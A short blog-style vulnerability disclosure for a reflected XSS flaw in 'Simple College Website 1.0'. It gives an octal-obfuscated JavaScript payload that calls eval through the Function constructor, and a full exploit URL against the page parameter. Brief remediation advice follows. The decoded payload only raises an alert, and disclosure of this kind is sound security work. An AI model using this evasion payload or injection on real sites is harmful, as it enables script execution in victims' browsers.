Simple College Website 1.0 — XSS

Photo by Muha Ajjan on Unsplash

Identification

Burp Req/Res

Hacking

[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()
http://<domain>/college_website/index.php?page=<script>[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)()</script>
Script execution

Remediation

  1. Filter input on arrival.
  2. Encode data on output.

Unlisted

--

--

What could be more fun than breaking stuffs!!!

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Gowthamaraj(@fuffsec)

Gowthamaraj(@fuffsec)

What could be more fun than breaking stuffs!!!